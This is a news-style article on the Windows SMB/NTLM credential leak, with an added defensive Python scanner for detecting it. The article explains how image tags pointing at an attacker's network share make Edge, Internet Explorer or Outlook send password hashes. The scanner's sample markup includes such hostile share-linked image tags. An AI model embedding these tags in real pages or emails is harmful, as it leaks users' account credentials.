This article is for anyone who is excited about the Windows 10 Anniversary Update. The company is expected to release the much-anticipated update today, but it does not intend to secure its system against a serious security gap that has been open to malicious users since 1997.
A flaw in how Windows handles old shared network resources can leak the user's Microsoft account name and password, or VPN credentials if the victim uses a VPN to browse the Internet.
The exploit allows an attacker to embed a link to an SMB resource (network share) in a web page or in an e-mail that must be viewed through Edge or Internet Explorer, or through Outlook, respectively.
The attacker can disguise the link to the network share by placing it inside image tags: instead of a proper link to the image, the tag carries a link to a network share hosted on the attacker's own network.
When a user opens this link through Internet Explorer, Edge, or Outlook, because of the way Windows handles authentication on public networks, their computer will automatically send their login credentials to the attacker's computer for authentication.
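As an added example (not from the original article or from ValdikSS), a mail or web gateway could flag the pattern described above: markup that makes the client load an image or other resource from a network share without a click. The function names, the attribute list and the reading of "local" as the RFC 1918 ranges are assumptions of this example, and the sample markup is constructed.

```python
from html.parser import HTMLParser
from ipaddress import ip_address, ip_network
from urllib.parse import urlsplit

AUTOLOAD = {"src", "background", "poster"}    # fetched on render, no click needed
# Assumption: "local networks" means the RFC 1918 private ranges.
LOCAL_NETS = [ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

def smb_host(url):
    """Server name if url is a UNC path or a remote file:// URL, else None."""
    url = url.strip()
    if url.startswith("\\\\"):                        # \\server\share\file
        return url[2:].replace("\\", "/").split("/")[0] or None
    try:
        parts = urlsplit(url.replace("\\", "/"))
    except ValueError:                                # malformed URL, nothing to flag
        return None
    if parts.scheme != "file":
        return None
    if parts.hostname not in (None, "localhost"):     # file://server/share/file
        return parts.hostname
    if parts.path.startswith("//"):                   # file:////server/share/file
        return parts.path[2:].split("/")[0] or None
    return None                                       # file:///C:/... is a local file

def is_external(host):
    """False only for IP literals inside LOCAL_NETS; names count as external."""
    try:
        return not any(ip_address(host) in net for net in LOCAL_NETS)
    except ValueError:                                # a name, not resolved offline
        return True

def scan(html):
    """List (tag, attribute, host, external) for each auto-loaded share reference."""
    findings = []
    class Finder(HTMLParser):
        def handle_starttag(self, tag, attrs):
            for name, value in attrs:
                if value and (name in AUTOLOAD or (tag, name) == ("link", "href")):
                    host = smb_host(value)
                    if host:
                        findings.append((tag, name, host, is_external(host)))
    Finder().feed(html)
    return findings

# Constructed sample message body (documentation addresses and names only).
SAMPLE = r'''<img src="https://www.example.com/logo.png">
<img src="\\203.0.113.7\share\pixel.png" width="1" height="1">
<img src="file://files.example.net/pub/banner.jpg">
<img src="\\192.168.1.20\media\photo.jpg">
<a href="\\203.0.113.7\share\doc.txt">a link the reader has to click</a>'''
```

`scan(SAMPLE)` reports the three `<img>` share references and marks the one on `192.168.1.20` as local; the `<a>` link is ignored because it is only followed on a click.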
The Microsoft account password is not sent in plain text but as an NTLM hash. Researchers have long since shown that these hashes can be cracked easily.
The issue described above is not new and is not limited to Windows 10. Microsoft and the research community have been aware of it since 1997, and it is often discussed at security conferences such as Black Hat.
But what has changed since Windows 8 is that Microsoft has begun to allow users to authenticate to their computers with Microsoft accounts.
In Windows 10, this has become the de facto method for authentication, which means that more users have started using it.
In recent years, Microsoft has begun to connect all of its online services with the user's Microsoft account.
Thus, according to ProstoVPN's ValdikSS, this old attack allows fraudsters to obtain Microsoft account credentials that grant indirect access to all of the company's services: Windows 10, Skype, Xbox, OneDrive, Office 365, MSN, Bing, Azure, and many others.
ValdikSS reports that the easiest way to protect yourself from such attacks is to block all outgoing SMB connections (port 445) in the Windows Firewall, except those to local networks.